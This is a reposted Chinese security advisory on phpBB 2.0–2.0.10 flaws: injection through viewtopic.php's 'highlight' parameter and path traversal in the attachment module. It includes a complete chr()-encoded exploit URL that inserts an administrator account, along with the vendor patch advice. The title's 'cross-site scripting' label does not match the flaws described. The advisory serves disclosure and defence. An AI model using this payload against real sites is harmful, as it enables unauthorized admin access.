phpBB任意用户增加和附件模块跨站脚本漏洞

2008-04-09 04:21:54来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

phpBB任意用户增加和附件模块跨站脚本漏洞

发布日期:2004-11-26
更新日期:2004-11-29

受影响系统:
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0
不受影响系统:
phpBB Group phpBB 2.0.11
描述:
phpBB是一款使用多种模块扩展的流行的论坛系统。

phpBB 'viewtopic.php'对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞增加任意拥有管理权限的用户帐户。

'viewtopic.php'对'highlight'参数缺少充分检查,提交使用多个char()函数的SQL查询,可在系统中增加管理员权限的用户帐户。

另外附件模块对用户提交给"UPLOAD_DIR"字段数据缺少充分过滤,提交包含多个'../'字符的数据,可绕过WEB ROOT限制,以进程权限查看系统文件内容。

<*来源:Zeelock (zee@psybnc.it)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=110150451810187&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Zeelock (zee@psybnc.it)提供了如下测试方法:

--- Code start ----

http://site.com/forum/viewtopic.php?t=30&highlight=%27%2emysql_query(chr
(73)%2echr(78)%2echr(83)%2echr(69)%2echr(82)%2echr(84)%2echr(32)
%2echr(73)%2echr(78)%2echr(84)%2echr(79)%2echr(32)%2echr(112)%
2echr(104)%2echr(112)%2echr(98)%2echr(98)%2echr(95)%2echr(117)%2
echr(115)%2echr(101)%2echr(114)%2echr(115)%2echr(40)%2echr(117)%
2echr(115)%2echr(101)%2echr(114)%2echr(95)%2echr(105)%2echr(100)%2
52echr(44)%2echr(117)%2echr(115)%2echr(101)%2echr(114)%2echr(95)%2
52echr(97)%2echr(99)%2echr(116)%2echr(105)%2echr(118)%2echr(101)%2
52echr(44)%2echr(117)%2echr(115)%2echr(101)%2echr(114)%2echr(110)%
252echr(97)%2echr(109)%2echr(101)%2echr(44)%2echr(117)%2echr(115)%
252echr(101)%2echr(114)%2echr(95)%2echr(112)%2echr(97)%2echr(115)%
252echr(115)%2echr(119)%2echr(111)%2echr(114)%2echr(100)%2echr(44)
%2echr(117)%2echr(115)%2echr(101)%2echr(114)%2echr(95)%2echr(108
)%2echr(101)%2echr(118)%2echr(101)%2echr(108)%2echr(41)%2echr(32
)%2echr(86)%2echr(65)%2echr(76)%2echr(85)%2echr(69)%2echr(83)%
2echr(32)%2echr(40)%2echr(39)%2echr(57)%2echr(57)%2echr(57)%2ech
r(57)%2echr(57)%2echr(39)%2echr(44)%2echr(39)%2echr(49)%2echr(39
)%2echr(44)%2echr(39)%2echr(122)%2echr(101)%2echr(51)%2echr(108)
%2echr(111)%2echr(99)%2echr(107)%2echr(39)%2echr(44)%2echr(39)%2
52echr(98)%2echr(97)%2echr(51)%2echr(99)%2echr(56)%2echr(51)%2ec
hr(51)%2echr(52)%2echr(56)%2echr(98)%2echr(100)%2echr(100)%2echr
(102)%2echr(55)%2echr(98)%2echr(51)%2echr(54)%2echr(56)%2echr(98
)%2echr(52)%2echr(55)%2echr(56)%2echr(97)%2echr(99)%2echr(48)%
2echr(54)%2echr(100)%2echr(51)%2echr(51)%2echr(52)%2echr(48)%2ec
hr(101)%2echr(39)%2echr(44)%2echr(39)%2echr(49)%2echr(39)%2echr(
41))%2e%27

--- code end ---

建议:
厂商补丁:

phpBB Group
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到phpBB 2.0.11版本:

http://www.phpbb.com

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:phpCMS

下一篇:Microsoft WINS内存覆盖任意指令执行漏洞